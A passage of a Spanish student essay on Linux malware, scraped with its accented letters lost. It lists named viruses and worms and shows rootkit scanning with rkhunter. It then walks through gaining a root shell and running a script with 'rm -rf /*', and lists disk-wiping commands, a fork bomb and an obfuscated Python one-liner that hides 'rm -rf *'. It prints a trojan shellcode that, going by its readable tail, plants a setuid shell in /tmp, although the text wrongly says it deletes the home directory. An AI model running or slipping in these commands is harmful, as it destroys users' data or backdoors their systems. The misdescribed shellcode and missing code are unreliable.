You are on page 1of 15

La cantidad de software malicioso disponible en GNU/Linux, incluyendo virus,

troyanos y otro software escrito especficamente para GNU/Linux, se ha


incrementado en los ltimos aos, duplicndose durante 2005 debido a la
explosin del sistema operativo en entornos de usuario final e ingreso al
mercado de las computadoras de escritorio.
Hoy en da podemos encontrar estos archivos maliciosos o potencialmente
dainos en nuestro sistema:

Troyanos:
Kaiten Linux.Backdoor.Kaiten trojan horse
Rexob Linux.Backdoor.Rexob trojan
Virus:
Alaeda Virus.Linux.Alaeda
Bad Bunny Perl.Badbunny
Binom Linux/Binom
Bliss
Brundle
Bukowski
Diesel Virus.Linux.Diesel.962
Kagob a Virus.Linux.Kagob.a
Kagob b Virus.Linux.Kagob.b
MetaPHOR (also known as Simile)
Nuxbee Virus.Linux.Nuxbee.1403
OSF.8759
Podloso Linux.Podloso (The iPod virus)
Rike Virus.Linux.Rike.1627
RST Virus.Linux.RST.a
Satyr Virus.Linux.Satyr.a
Staog
Vit Virus.Linux.Vit.4096
Winter Virus.Linux.Winter.341
Winux (also known as Lindose and PEElf
ZipWorm Virus.Linux.ZipWorm
Gusanos:

Adm Net-Worm.Linux.Adm
Adore
Cheese Net-Worm.Linux.Cheese
Devnull
Kork
Linux/Lion (also known as Ramen)
Mighty Net-Worm.Linux.Mighty
Millen Linux.Millen.Worm
Slapper
SSH Bruteforce

En la actualidad hay pocas descripciones disponibles de estos programas


maliciosos, sin embargo tambin tenemos estos:
Un rootkit permite acceso a un ordenador ajeno oculto a los Administradores
del sistema. Como su nombre indica, se puede definir como un conjunto de
herramientas para acceder a la raz del sistema. Aunque no es exactamente
un malware, ya que se instala despus de comprometer la mquina, el hecho
de que esconda procesos ha hecho que se le asocie en este campo.
Aunque la deteccin de un rootkit es difcil por motivos comentados, existe
una herramienta para entornos UNIX llamada rootkit hunter. La instalaremos
desde la terminal:

root@kali:~/Desktop# apt-get install rkhunter

Una vez instalado, iniciamos el programa para que compruebe el sistema:

root@kali:~/Desktop# rkhunter --check

El proceso ir comprobando el sistema indicando el estado. Si en la


configuracin del sistema aparece algn punto dbil que puede permitir un
acceso, nos avisar. En mi caso, me avisa de tener el acceso root por SSH,
que podra comprometerme ante un ataque de fuerza bruta si la contrasea
fuese dbil:

As pues, me dispongo a desactivarlo:

root@kali:~/Desktop# nano /etc/ssh/sshd_config

Y desactivo el acceso:

Una simple shellcode


Todos conocemos a alguien que ve los virus de ordenador como lo peor del
mundo. Luego hay otros que creen que formateando peridicamente los
discos duros se salvan de todo mal o lo previenen mejor. Aqu se demostrar
lo contrario: virus que no se detectan y te pueden ayudar a formatear el
ordenador.

Entrando en la Shellcode
Tal y como podemos deducir por su nombre, una Shellcode es un cdigo
que nos va a devolver una ventana de comandos. Generalmente son cdigos
cortos, ya que se tienen que introducir en la memria de la pila.
Escribir una shellcode en C. Esta es la ms bsica y la ms conocida:

A continuacin compilaremos el cdigo desde la terminal:


root@kali:~/Desktop gcc shell.c -o give_me_shell

Antes de ejecutar, vamos a suponer que es un programa en C que nos ha


mandado un compaero de clase bromista. Como no acabamos de fiarnos, lo
analizamos con el edb-debugger:
root@kali:~/Desktop edb --symbols give_me_shell

Observando la lnea del execve, vemos que es una funcin que llama al
sistema para ejecutar un programa. Nos la jugamos y ejecutamos:
root@kali:~/Desktop ./give_me_shell

Como se esperaba, el cdigo nos devuelve una Shell en la que


somos superusuarios. Hasta aqu todo bien pero Cmo formateo el
ordenador? Ahora podemos usar todos los comandos de bash. Escribimos un
programa con una lista de comandos usando vi, el editor de texto ms
engorroso que existe:

# vi f_ck.sh

rm -rf /*

Pulsaremos ESC y a continuacin escribiremos: x para salir guardando


cambios. Quedar darle permisos de ejecucin y ejecutar:
# chmod +x f_ck.sh
# ./f_ck.sh

Tambin podemos encontrar comandos, usados correctamente se podran


realizar actividades maliciosos.
Antes de mostrar estos cdigos debo advertir que este ensayo es solo
investigativo y por lo tanto decir que estos comandos podran dejar un
sistema inservible.
rm -rf /
rm -rf .
rm -rf *
rm (borrar), -r (recursivo), f (forzar, sin confirmacin). Todo un clsico, borrar
todo, el directorio actual o todos los ficheros visibles del directorio actual, si
ejecutas el primero como root, hasta dnde llegar antes de petar?, creo
que me quedar con la duda

mkfs
mkfs.ext3
mkfs.cualquier_cosa
mkfs (crea un sistema de ficheros). Reformatea lo que viene despus del
comando creando en su lugar un sistema de ficheros nuevo y limpio.
cualquier_comando > /dev/sda
dd if=algo of=/dev/sda
Esto escribe informacin en un dispositivo directamente ignorando el
sistema de ficheros, que probablemente acabar corrompindose.
Una bomba fork que satura la tabla de procesos del sistema, fcilmente
evitable.
Ficheros comprimidos que cuando se descomprimen te inundan el sistema
de archivos, te dejan sin espacio en el disco, o te sobrescriben ficheros.
Scripts o programas creados por gente malvada, hay que leer el cdigo
fuente de cualquier cosa descargada de una fuente no fiable o cruzar los
dedos y encomendarse a Dios mientras se ejecuta (la efectividad de este
mtodo no est probada). Como ejemplo, el mensaje en una lista de correo
que ofreca un programilla en C para aprovecharse de un exploit del
comando sudo, veamos la parte interesante del mismo:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */

= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Esto trozo de cdigo hexadecimal ejecuta un rm -rf ~ / &, borraremos
nuestro home y si somos root todo el disco.
Hay que tener cuidado en especial al tocar otros comandos como
chmod, chown y chgrp que alteran los permisos, propietario y grupo de los
ficheros ya que podramos conceder acceso a cualquiera o dejar el sistema
hecho un desastre si se aplican de forma recursiva sin control.
Tambin recordar que todos estos comandos se pueden ejecutar mediante
scripts en lenguajes como python, por ejemplo este cdigo:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
Ejecuta un rm -rf * oculto tras el sn!.sg!+.
Despus de esta investigacin, ahora sabemos que Linux no es un sistema
100% seguro y que su consola tiene un gran poder a la hora de ejecutar

comandos malintencionados que una vez caen en manos de personas


malintencionadas trae un riesgo para todos los usuarios.

GLOSARIO:
1. SCAREWARE abarca varias clases de software para estafar con
cargas maliciosas
2. SPYWARE programa espa es un software que recopila informacin
de un ordenador y despus transmite esta informacin a una entidad
externa
3. CRIMEWARE es una clase de software malicioso diseado
especficamente para automatizar el delito ciberntico.

WEBGRAFIA:
www.wikipedia.com
www.taringa.net
http://sinconexion.net/linux

You might also like